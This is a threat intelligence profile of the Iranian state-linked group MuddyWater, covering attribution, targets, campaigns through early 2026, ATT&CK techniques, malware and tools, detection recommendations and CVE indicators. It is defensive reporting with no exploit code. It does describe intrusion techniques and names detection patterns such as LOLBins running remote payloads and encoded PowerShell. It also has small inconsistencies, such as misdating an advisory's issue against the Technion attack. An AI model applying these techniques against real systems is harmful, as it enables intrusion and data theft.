MuddyWater

Executive Summary

Intelligence Cut-off Date: 12-Apr-2026

MuddyWater is an Iranian state-sponsored advanced persistent threat group assessed with high confidence to be a subordinate element of Iran’s Ministry of Intelligence and Security (MOIS). Operating continuously since at least 2017 under numerous vendor aliases, the group conducts broad cyber espionage campaigns targeting government, telecommunications, defense, energy, and critical infrastructure sectors across the Middle East, North Africa, Europe, and North America. As of early 2026, MuddyWater has escalated significantly: the group pre-positioned backdoors inside US financial, aviation, and defense supply chain networks ahead of the February 28 Operation Epic Fury kinetic strikes, demonstrating a clear capability and mandate to transition from espionage to disruptive operations on short notice.

Overall Assessment: [Confidence: HIGH] — Attribution to MOIS is formally confirmed by a joint FBI/CISA/NSA/CNMF/NCSC-UK advisory (AA22-055A, 2022). Ongoing 2026 campaign activity is documented by Symantec/Broadcom (March 2026), Group-IB (February 2026), Unit 42/Palo Alto (March 2026), and Check Point Research (March 2026).

---

Identity and Attribution

MuddyWater (MITRE G0069) is tracked under a wide range of vendor-assigned names reflecting the fragmented nature of threat intelligence attribution across the industry. Microsoft tracks the group as MERCURY (legacy) and Mango Sandstorm (current). Proofpoint designates it TA450. CrowdStrike uses the name COBALT ULSTER. Secureworks uses Static Kitten. Mandiant and Google Cloud have tracked it as TEMP.Zagros. Trend Micro tracks the group as Earth Vetala. Unit 42 (Palo Alto Networks) recently introduced Boggy Serpens as a distinct but overlapping designation. All of these names are assessed to refer to the same core actor or closely related sub-clusters operating under MOIS direction. [Source: MITRE ATT&CK G0069, Rating: A1]

The group was first publicly documented by Palo Alto Networks in November 2017. The name “MuddyWater” was coined because early campaigns were difficult to attribute and were routinely confused with other intrusion sets. [Source: Wikipedia / Palo Alto Networks 2017, Rating: B2]

Formal government attribution to MOIS came in February 2022 through joint advisory AA22-055A, issued by the FBI, CISA, NSA, US Cyber Command’s Cyber National Mission Force (CNMF), and the UK National Cyber Security Centre (NCSC-UK). The advisory described MuddyWater as “a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).” [Source: CISA Advisory AA22-055A, Rating: A1]

Researchers have characterized MuddyWater as a “conglomerate” composed of several smaller, semi-autonomous clusters that may operate on different regional mandates or objectives. This organizational structure complicates clean attribution: overlapping tooling, shared infrastructure, and criminal ecosystem crossover have repeatedly led to misattribution and confusion among researchers. [Source: Check Point Research, March 2026, Rating: B2]

---

Motive and Objective

MuddyWater’s primary motive is espionage in support of Iranian strategic intelligence priorities: regional geopolitical monitoring, technology transfer, sanctions evasion support, and tracking of dissidents and dissident networks abroad. The group’s operational mandate aligns tightly with MOIS institutional responsibilities, which were formally expanded in 2017 to include increased activity abroad. [Source: HawkEye Threat Advisory, Rating: B2]

Beyond traditional espionage, MuddyWater has demonstrated a willingness to conduct or facilitate destructive operations when geopolitical conditions warrant. In 2023, Microsoft documented the group (as MERCURY) establishing initial access via Log4Shell exploitation before handing off to a separate cluster (DEV-1084) that executed destructive operations masquerading as ransomware, including the 2023 attack on the Technion – Israel Institute of Technology using the false persona “DarkBit.” [Source: Wikipedia / Microsoft reporting, Rating: B2]

The most significant escalation of objective scope came in early 2026: Symantec/Broadcom documented MuddyWater pre-positioning backdoors inside US critical infrastructure — a bank, an airport, defense aerospace software supply chain operations — weeks before the February 28, 2026 joint US-Israeli military strikes on Iran (Operation Epic Fury). This pre-positioning, combined with the use of previously unknown tooling (Dindoor), indicates that MuddyWater was tasked to hold US targets at risk as a deterrent or retaliatory instrument — not merely to collect intelligence. [Source: Symantec/Broadcom (March 2026), Rating: A1; SC Media (March 2026), Rating: B2]

---

Victimology

MuddyWater targets span a wide range of sectors with a clear weighting toward government agencies, telecommunications providers, defense organizations, energy and oil-and-gas companies, and critical infrastructure. Recent 2025–2026 campaigns have added financial institutions (US bank), aviation infrastructure (US airport), maritime operators (Middle East energy and marine company), and academic institutions to the documented target set. [Source: MITRE ATT&CK G0069 (A1), Symantec/Broadcom March 2026 (A1), Unit 42 March 2026 (B2)]

Geographically, the primary focus remains the Middle East — Saudi Arabia, UAE, Kuwait, Bahrain, Jordan, Iraq, Israel, Turkey — with documented operations expanding into North Africa (Egypt, Sudan, Tanzania), South and Central Asia, Europe, and North America. Recent 2025 campaigns specifically targeted US manufacturing and transportation sectors. [Source: Picus Security, March 2026, Rating: B2]

The group frequently targets third-party managed service providers and IT contractors as a supply chain entry point to downstream organizations. The 2021 compromise of Israeli IT provider “Rashim” to reach customer organizations is a documented example of this technique. [Source: Picus Security, Rating: B2]

Sector Proximity Assessment:

• Global telecommunications: Direct — Core long-term target set since 2017 first campaigns; persistent focus across all subsequent years
• Defense technology / high-tech startups: Direct — Defense aerospace software supplier targeted February 2026; direct overlap with DIB targeting mandate
• Government / think tanks: Direct — Primary MOIS intelligence collection target; 100+ government entities targeted in single October 2025 campaign
• Higher education / research institutions: Adjacent — Technion (Israel) destroyed in Feb 2023; universities historically targeted for telecom/defense research access
• Venture capital / investment: Adjacent — US bank confirmed target February 2026; financial sector exposure via portfolio companies in telecom and defense

---

Capability Assessment

Rating: Moderate [Confidence: HIGH]

MuddyWater occupies the upper range of the “moderate” capability tier. The group does not routinely exploit zero-day vulnerabilities — its initial access is predominantly n-day exploitation and social engineering — but its tooling breadth, operational persistence, and rapid retooling cycle demonstrate a well-resourced actor that consistently evades detection and maintains long-term access across targeted environments. [Source: MITRE ATT&CK G0069, Rating: A1; Picus Security, Rating: B2]

Key capability indicators supporting this rating:

Tooling breadth and evolution: MuddyWater has developed and rotated through multiple custom C2 frameworks (MuddyC3, PhonyC2, MuddyC2Go, DarkBeatC2) in addition to custom implants (POWERSTATS, BugSleep, MuddyViper, RustyWater, Dindoor, CHAR, GhostFetch, BlackBeard, Nuso). The introduction of Rust-based implants (RustyWater, BlackBeard) in late 2025–2026 represents a meaningful tooling evolution toward more structured, lower-noise capabilities. [Source: CloudSEK January 2026 (B2); Group-IB February 2026 (B2); Unit 42 March 2026 (B2)]

Attribution evasion: The group leverages legitimate RMM tools (Atera, ConnectWise, SimpleHelp, N-able, MeshCentral, PDQ, Action1), code-signed backdoors with stolen certificates, and criminal ecosystem crossover to complicate attribution and defeat signature-based detection. [Source: SC Media March 2026 (B2); Check Point Research March 2026 (B2)]

Operational persistence: Pre-positioned backdoors in US networks were maintained for weeks before kinetic strikes without detection, indicating dwell times consistent with a capable actor. The group conducted four distinct attack waves against a single Middle Eastern maritime/energy target over a six-month period (August 2025–February 2026). [Source: Symantec/Broadcom March 2026 (A1); Unit 42 March 2026 (B2)]

Zero-day gap: No publicly confirmed zero-day exploitation. The group exploits known CVEs (Zerologon, PaperCut, ProxyShell, Log4Shell, CVE-2017-0199) with a pattern of rapid opportunistic exploitation of publicly reported vulnerabilities before organizations have patched. This is the primary downward pressure on the capability rating. [Source: Picus Security (B2); FortiGuard (C3)]

---

Modus Operandi

Key Campaigns

Campaign	Timeframe	Description
Initial Middle East Campaigns	2017	First documented activity; PowerShell POWERSTATS backdoor targeting Saudi Arabia, Iraq, Israel, UAE, Turkey, US, India, Pakistan
RMM Pivot Phase	2022–2023	Shifted primary post-compromise persistence from custom C2 to legitimate RMM tools (ScreenConnect, Syncro, Atera, RemoteUtilities) to evade EDR detection
Technion / DarkBit Ransomware	2023-02	MERCURY/DEV-1084 collaboration; destructive attack on Technion using false ransomware persona “DarkBit”; Joint advisory AA22-055A issued same month
MuddyC2Go & PhonyC2 Operations	2023-06 to 2024-04	New C2 frameworks deployed against Israeli and regional targets; custom implant refresh cycle indicating active R&D
Atera RMM Campaign	2025-03	HarfangLab documented spear-phishing delivery of Atera agent installers in password-protected archives targeting Middle East organizations
Phoenix Backdoor Campaign	2025-10	Compromised mailbox used to deliver malicious Word documents across MENA; 100+ government entities targeted; Phoenix backdoor deployed
MuddyViper Against Israel	2024-09 to 2025-03	ESET documented MuddyViper backdoor deployment against Israeli organizations
RustyWater Campaign	2026-01	Rust-based RAT deployed via spear-phishing targeting Israeli diplomatic, maritime, financial, telecom entities; Hebrew-language lures; evidence of expansion to India, UAE
Operation Olalampo	2026-01-26	Group-IB documented MENA-wide campaign; CHAR, GhostFetch, HTTP_VIP, GhostBackDoor malware families; Telegram bot C2
US Pre-Positioning / Dindoor	2026-02	Backdoored US bank, US airport, Canadian NGO, defense aerospace software supplier weeks before Operation Epic Fury; Dindoor (Deno runtime) + Rclone exfil to Wasabi cloud
Boggy Serpens Maritime Campaign	2025-08 to 2026-02	Four attack waves against single Middle East energy/marine company; AI-assisted code, BlackBeard Rust backdoor, Nuso HTTP backdoor deployed

MITRE ATT&CK TTPs

Phase	Technique ID	Technique Name	Notes
Initial Access	T1566.001	Phishing: Spearphishing Attachment	Word docs, malicious Office attachments, ZIP archives
Initial Access	T1566.002	Phishing: Spearphishing Link	Malicious links in email bodies
Initial Access	T1190	Exploit Public-Facing Application	Log4Shell, ProxyShell, PaperCut (CVE-2023-27350)
Initial Access	T1195.002	Supply Chain Compromise: Software Supply Chain	Rashim IT provider compromise (2021)
Initial Access	T1078	Valid Accounts	Compromised email accounts used for phishing delivery
Execution	T1059.001	Command and Scripting Interpreter: PowerShell	POWERSTATS; core technique across all years
Execution	T1059.005	Command and Scripting Interpreter: Visual Basic	VBScript loaders
Execution	T1059.007	Command and Scripting Interpreter: JavaScript	Dindoor via Deno runtime; Tsundere Botnet Node.js
Execution	T1204.002	User Execution: Malicious File	Victim must open malicious Office document
Execution	T1218.005	System Binary Proxy Execution: Mshta	LOLBin abuse
Execution	T1218.010	System Binary Proxy Execution: Regsvr32	LOLBin abuse
Execution	T1218.011	System Binary Proxy Execution: Rundll32	LOLBin abuse
Persistence	T1547.001	Boot or Logon Autostart Execution: Registry Run Keys	Registry run key persistence
Persistence	T1547.004	Boot or Logon Autostart Execution: Winlogon Helper DLL	Observed in toolkit
Persistence	T1219	Remote Access Software	Atera, ConnectWise, SimpleHelp, N-able, MeshCentral, PDQ, Action1
Defense Evasion	T1027	Obfuscated Files or Information	Encoded/encrypted PowerShell; obfuscated scripts
Defense Evasion	T1562.001	Impair Defenses: Disable or Modify Tools	Security software termination
Defense Evasion	T1036	Masquerading	Stolen code-signing certificates on backdoors
Defense Evasion	T1197	BITS Jobs	Observed in toolkit
Credential Access	T1003	OS Credential Dumping	LaZagne, Mimikatz-equivalent tooling
Credential Access	T1003.001	OS Credential Dumping: LSASS Memory	LSASS access for credential harvesting
Credential Access	T1528	Steal Application Access Token	Custom Chromium-based credential stealer (2025) targeting Chrome, Brave, Edge, Opera
Discovery	T1083	File and Directory Discovery	Standard enumeration post-access
Discovery	T1057	Process Discovery	Pre-exfiltration enumeration
Lateral Movement	T1021.001	Remote Services: Remote Desktop Protocol	Post-compromise lateral movement
Collection	T1113	Screen Capture	CCTV/camera access prior to kinetic operations (Amazon TI, 2024)
Command and Control	T1071.001	Application Layer Protocol: Web Protocols	HTTP/S-based C2 (MuddyC2Go, DarkBeatC2)
Command and Control	T1102	Web Service	Telegram bot C2 (Operation Olalampo); cloud hosting
Command and Control	T1573	Encrypted Channel	Encrypted C2 communications
Command and Control	T1090	Proxy	Chisel, PLink, FRP for tunneling; reverse proxy chains
Exfiltration	T1048	Exfiltration Over Alternative Protocol	Rclone to Wasabi cloud storage (Feb 2026)
Exfiltration	T1567.002	Exfiltration Over Web Service: Exfiltration to Cloud Storage	Wasabi cloud storage bucket (Dindoor campaign)

Tools and Malware

Custom C2 Frameworks (chronological):

• MuddyC3 — Early custom framework
• PhonyC2 — Documented June 2023 (Deep Instinct)
• MuddyC2Go — Golang-based C2; November 2023 (Deep Instinct)
• DarkBeatC2 — Latest framework iteration; April 2024 (Deep Instinct)

Custom Implants / Backdoors:

• POWERSTATS — Signature PowerShell-based first-stage backdoor; slowly evolving since 2017
• BugSleep — Custom implant; documented in 2024
• MuddyViper — Custom backdoor against Israeli organizations (Sep 2024–Mar 2025; ESET)
• RustyWater — Rust-based RAT; significant stealth/evasion upgrade; Jan 2026 (CloudSEK)
• Dindoor — Deno JavaScript runtime backdoor; Feb 2026 (Symantec/Broadcom)
• BlackBeard — Rust-based backdoor; maritime/energy campaign (Unit 42)
• CHAR / GhostFetch / HTTP_VIP / GhostBackDoor — Operation Olalampo toolset; Jan 2026 (Group-IB)
• Nuso — Custom HTTP backdoor; Boggy Serpens maritime campaign (Unit 42)
• Phoenix — Custom backdoor; October 2025 government campaign
• DCHSpy — Surveillanceware; documented by Lookout during Israel-Iran conflict

Open Source / LOLBIN Tools:

• LaZagne (credential dumping)
• Chisel, PLink, FRP (Fast Reverse Proxy), Ligolo (tunneling)
• Rclone (cloud exfiltration)
• Mimikatz-equivalent techniques

Legitimate RMM Tools (abused for persistence):

• Atera Agent, ConnectWise ScreenConnect, SimpleHelp, N-able, MeshCentral, PDQ, Action1, RemoteUtilities, Syncro

Infrastructure Patterns

MuddyWater’s infrastructure posture is characterized by deliberate obfuscation and layered deniability. The group rotates infrastructure frequently, making IOC-based defenses insufficient as a sole detection strategy. [Source: HawkEye Advisory, Rating: B2]

Key infrastructure patterns include: abuse of compromised email accounts for phishing delivery (appearing to originate from trusted organizations), deployment of RMM tooling to establish persistent access over vendor-legitimate communication channels, use of cloud services (Telegram, Wasabi) for C2 and exfiltration to blend with legitimate traffic, and progressive adoption of commercial VPS hosting for custom C2 frameworks. [Source: MITRE ATT&CK G0069, Rating: A1; Group-IB Feb 2026, Rating: B2]

The Dindoor campaign (February 2026) used Deno runtime execution and code-signing certificates stolen from legitimate vendors to make backdoor activity appear legitimate. Rclone was used to exfiltrate data directly to a Wasabi cloud storage bucket, further avoiding traditional on-premises exfiltration detection. [Source: Symantec/Broadcom March 2026, Rating: A1]

Check Point Research (March 2026) documented overlap between MuddyWater and criminal infrastructure — shared code-signing certificates sourced from the same criminal marketplace as the CastleLoader affiliate ecosystem — suggesting deliberate use of criminal services for attribution obfuscation. [Source: Check Point Research March 2026, Rating: B2]

---

Activity Timeline

Date	Event	Source	Rating
2026-03	Unit 42 (Boggy Serpens) reports refined operations: trusted-relationship compromises, wider maritime/aviation/financial targeting, Rust-based Nuso malware	Unit 42, Palo Alto Networks	B2
2026-03-05	Symantec/Broadcom documents MuddyWater activity in US bank, US airport, Canadian NGO, and Israeli ops of US defense software supplier; Dindoor backdoor identified	Symantec / Broadcom	A1
2026-03	Check Point Research publishes analysis linking MuddyWater to criminal tooling ecosystem and Tsundere Botnet; misattribution risk highlighted	Check Point Research	B2
2026-02-26	Operation Olalampo (Group-IB): MENA cyberespionage campaign launched Jan 26 2026 with CHAR, GhostFetch, HTTP_VIP, GhostBackDoor; Telegram bot C2	Group-IB	B2
2026-02	Pre-positioning confirmed in US critical infrastructure starting early February, weeks ahead of Operation Epic Fury kinetic strikes (Feb 28)	Symantec / Broadcom	A1
2026-01	CloudSEK documents RustyWater campaign targeting Israeli diplomatic, maritime, telecom, financial entities; Rust-based RAT with Hebrew-language lures; expansion to India, UAE	CloudSEK	B2
2025-10	Phoenix backdoor campaign: compromised mailbox used to send malicious Word docs across MENA; 100+ government entities targeted	The Register / Multiple	B2
2025-10	Shamir Medical Center (Israel) hit by attack later linked to Iranian actors; initially misclassified as Qilin ransomware	Check Point Research	B2
2025-08 to 2026-02	Four-wave sustained campaign against Middle East maritime/energy company (Boggy Serpens); AI-assisted code development; BlackBeard Rust backdoor	Unit 42	B2
2025-03	HarfangLab documents Atera RMM agent campaign; spear-phishing delivery of RMM installers in password-protected archives	HarfangLab	B2
2024-11	Amazon Threat Intelligence correlates MuddyWater CCTV access with subsequent missile strikes in Israel and Red Sea; establishes ISR role in kinetic ops	Amazon Threat Intelligence	B2
2024-09 to 2025-03	MuddyViper backdoor deployed against Israeli organizations (ESET December 2024 disclosure)	ESET	B2
2024-04	DarkBeatC2 framework documented by Deep Instinct	Deep Instinct	B2
2024-03	TA450 spear-phishing campaign using PDF attachments with embedded links (Proofpoint)	Proofpoint	B2
2023-11	MuddyC2Go C2 framework spotted in Israel (Deep Instinct)	Deep Instinct	B2
2023-06	PhonyC2 C2 framework documented by Deep Instinct	Deep Instinct	B2
2023-02	Technion – Israel Institute of Technology destructive attack; false ransomware persona “DarkBit”; MERCURY + DEV-1084 collaboration (Microsoft)	Microsoft / Israel NCD	B2
2022-02	Joint advisory AA22-055A: FBI, CISA, NSA, CNMF, NCSC-UK formally attribute MuddyWater to Iranian MOIS	CISA / FBI / NSA / NCSC-UK	A1
2022-01	CNMF advisory: Iranian intel cyber suite uses open-source tools	US Cyber Command CNMF	A1
2021-09	US Treasury OFAC sanctions MOIS and Iran’s intelligence minister, citing MuddyWater activity	US Treasury	A1
~2020 to 2022	Pivot to RMM tool abuse (ScreenConnect, Syncro, RemoteUtilities) for persistence and evasion; cloud C2 introduced	Multiple vendors	B2
~2017	First documented campaigns; POWERSTATS PowerShell backdoor; Saudi Arabia, Iraq, Israel, UAE, Turkey, India, US	Palo Alto Networks 2017	B2

---

Forecast, Implications, and Recommendations

What Next (Forecast)

MuddyWater will remain operationally active through 2026 at elevated tempo, driven by the sustained fallout from Operation Epic Fury and the death of Iran’s Supreme Leader. [Confidence: HIGH] The group has demonstrated both the willingness and the capability to pre-position inside US and Western critical infrastructure for retaliatory use, and that posture is unlikely to be abandoned while kinetic and diplomatic tensions remain elevated.

The group’s rapid tooling cycle — introduction of Rust-based implants, Deno-runtime backdoors, AI-assisted code development, and Telegram bot C2 in a single six-month window — signals active R&D investment and suggests additional novel malware families will be deployed in H1–H2 2026. [Confidence: MODERATE] Defenders relying on signature-based detection against prior MuddyWater IOCs will face degraded efficacy.

MuddyWater’s documented use of criminal ecosystem services (shared code-signing certificates, Tsundere Botnet) will likely expand as the group seeks to further complicate attribution and leverage mature criminal infrastructure. [Confidence: MODERATE] This “gray-zone” approach will increase misattribution rates and may create false negatives in attribution workflows that rely on clean actor separation.

So What (Implications)

Any organization operating in the defense supply chain, government contracting, financial services, telecommunications, maritime, or aviation sectors must treat MuddyWater as a credible and active threat rather than a distant geopolitical concern. The February 2026 campaign demonstrated that the group will target US domestic entities (bank, airport) directly — not merely Middle Eastern subsidiaries — when geopolitical conditions warrant. The pre-positioning methodology means organizations may already host dormant access without detection.

The group’s abuse of legitimate RMM tools and code-signed backdoors creates a significant detection gap: activity appears indistinguishable from legitimate IT operations without behavioral analytics. Standard perimeter defenses and signature-based EDR are insufficient.

The correlation between MuddyWater CCTV access and subsequent missile strikes (documented by Amazon Threat Intelligence in November 2024) establishes a direct link between MuddyWater espionage activity and kinetic operations — raising the stakes of a successful intrusion beyond data theft.

Now What (Recommendations)

1. Hunt for RMM tool anomalies immediately — Audit all RMM software (Atera, ConnectWise, SimpleHelp, N-able, Action1, PDQ, MeshCentral) deployed in your environment. Confirm every installed instance was authorized through your IT procurement process. Flag any unrecognized installs for immediate investigation, as MuddyWater routinely deploys RMM agents via spear-phishing without IT knowledge.

2. Implement behavioral detection for LOLBin and PowerShell abuse — Deploy SIEM rules hunting for mshta.exe, regsvr32.exe, rundll32.exe, and certutil.exe executing encoded or remote payloads. Tune for PowerShell with -EncodedCommand, -WindowStyle Hidden, and -ExecutionPolicy Bypass flags. This targets MuddyWater’s most consistent technique pattern across all campaign years.

3. Block and monitor Deno / Node.js runtime execution in production environments — The Dindoor backdoor executes via Deno; Tsundere Botnet uses Node.js. Neither runtime should be present in standard enterprise endpoints. Application whitelisting that blocks unapproved JavaScript runtimes directly disrupts this specific TTPs cluster.

4. Prioritize phishing-resistant MFA and email security hardening — Spear-phishing remains MuddyWater’s dominant initial access vector. Implement DMARC/DKIM/SPF enforcement, sandbox detonation for all attachments, and disable Office macro execution for documents from external sources. The October 2025 Phoenix campaign used a compromised mailbox — monitor for anomalous send volume from internal accounts.

5. Conduct threat-informed purple team exercise targeting G0069 TTPs — Commission an adversary simulation exercise using MITRE ATT&CK G0069 as the threat model. Focus kill-chain coverage assessment on: RMM persistence (T1219), PowerShell execution (T1059.001), credential dumping (T1003), and cloud exfiltration (T1567.002). Validate detection coverage before the next escalation cycle, not after.

---

Technical Evidence

Type	Value	First Seen	Last Seen	Confidence
CVE	CVE-2020-1472 (Zerologon)	2020-09	2025-01	HIGH
CVE	CVE-2023-27350 (PaperCut)	2023-04	2024-06	HIGH
CVE	CVE-2021-44228 (Log4Shell)	2021-12	2023-06	HIGH
CVE	CVE-2017-0199 (Office RTF)	2017-04	2023-01	HIGH
CVE	CVE-2021-26855 (ProxyShell chain)	2021-03	2023-01	MODERATE
CVE	CVE-2021-36260 (Hikvision camera)	2021-09	2026-03	MODERATE
CVE	CVE-2025-34067 (Dahua/Hikvision camera)	2025-01	2026-03	MODERATE
Tool	Rclone (cloud exfil)	2022-01	2026-02	HIGH
Tool	LaZagne (credential dump)	2020-01	2026-01	HIGH
Tool	Chisel / PLink / FRP (tunneling)	2021-01	2026-01	HIGH
Infra	Wasabi cloud storage (exfil target)	2026-02	2026-02	HIGH
Malware	POWERSTATS (PowerShell backdoor)	2017-01	2025-06	HIGH
Malware	MuddyC2Go (Golang C2)	2023-11	2025-01	HIGH
Malware	DarkBeatC2 (C2 framework)	2024-04	2025-06	HIGH
Malware	BugSleep	2024-01	2025-06	HIGH
Malware	MuddyViper	2024-09	2025-03	HIGH
Malware	RustyWater (Rust RAT)	2026-01	2026-03	HIGH
Malware	Dindoor (Deno backdoor)	2026-02	2026-03	HIGH
Malware	CHAR / GhostFetch / HTTP_VIP	2026-01	2026-03	MODERATE
Malware	BlackBeard (Rust backdoor)	2025-08	2026-02	MODERATE
Malware	Phoenix backdoor	2025-10	2026-01	MODERATE
Malware	DCHSpy surveillanceware	2025-07	2025-12	MODERATE

Note: All domain and IP IOCs omitted — MuddyWater rotates infrastructure at high frequency, rendering specific network indicators stale within weeks. Use STIX/TAXII feeds from ISAC partners or CISA for current indicators. Behavioral analytics against the TTP patterns above are the more durable detection approach.

---

References

1. CISA, FBI, NSA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored MuddyWater Actors Conducting Malicious Cyber Operations (Advisory AA22-055A). https://www.cisa.gov/news-events/analysis-reports/ar22-055a. Rating: A1

2. CISA. (2022, February 24). Malware Analysis Report MAR–10369127–1.v1 – MuddyWater. https://www.cisa.gov/news-events/analysis-reports/ar22-055a. Rating: A1

3. US Cyber Command / CNMF. (2022, January 12). Iranian Intel Cyber Suite of Malware Uses Open Source Tools. https://www.cybercom.mil/Media/News/. Rating: A1

4. Symantec / Broadcom. (2026, March 5). MuddyWater Targets US Bank, Airport, Defense Supplier with Dindoor Backdoor. [Vendor blog]. Rating: A1

5. MITRE ATT&CK. MuddyWater (G0069). https://attack.mitre.org/groups/G0069/. Rating: A1

6. The Hacker News. (2026, March 9). Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoor. https://thehackernews.com/2026/03/iran-linked-muddywater-hackers-target.html. Rating: B2

7. SC Media. (2026, March 6). Iranian APT Group MuddyWater Targets Multiple US Companies. https://www.scworld.com/news/iranian-apt-group-muddywater-targets-multiple-us-companies. Rating: B2

8. Check Point Research. (2026, March 10). Iranian MOIS Actors & the Cyber Crime Connection. https://research.checkpoint.com/2026/iranian-mois-actors-the-cyber-crime-connection/. Rating: B2

9. Unit 42, Palo Alto Networks. (2026, March). Boggy Serpens Threat Assessment. https://unit42.paloaltonetworks.com/boggy-serpens-threat-assessment/. Rating: B2

10. Group-IB. (2026, February). Operation Olalampo: Inside MuddyWater’s Latest Campaign. [Vendor report]. Rating: B2

11. CloudSEK TRIAD Team. (2026, January 12). RustyWater: Iranian MuddyWater APT Deploys Rust-Based Implant. https://www.csoonline.com/article/4115379/iran-linked-muddywater-apt-deploys-rust-based-implant-in-latest-campaign.html. Rating: B2

12. ESET Research. (2024, December). MuddyViper Backdoor Against Israeli Organizations. [Vendor report]. Rating: B2

13. Deep Instinct. (2024, April). DarkBeatC2: The Latest MuddyWater Attack Framework. https://www.deepinstinct.com/blog/darkbeatc2. Rating: B2

14. Deep Instinct. (2023, November). MuddyC2Go — Latest C2 Framework Used by Iranian APT MuddyWater Spotted in Israel. https://www.deepinstinct.com/blog/muddyc2go. Rating: B2

15. Deep Instinct. (2023, June). PhonyC2: Revealing a New Malicious C2 Framework by MuddyWater. https://www.deepinstinct.com/blog/phonyc2. Rating: B2

16. HarfangLab. (2025, March). MuddyWater Campaign Abusing Atera Agents. https://harfanglab.io/. Rating: B2

17. Amazon Threat Intelligence. (2024, November). MuddyWater and Kinetic Operations. [Vendor report]. Rating: B2

18. Proofpoint. (2024, March 21). Security Brief: TA450 Uses Embedded Links in PDF Attachments in Latest Campaign. https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign. Rating: B2

19. Picus Security. (2026, March 12). Iranian Threat Actors: What Defenders Need to Know. https://www.picussecurity.com/resource/iranian-threat-actors-what-defenders-need-to-know. Rating: C3

20. Wikipedia. (Updated 2026). MuddyWater (hacker group). https://en.wikipedia.org/wiki/MuddyWater_(hacker_group). Rating: C3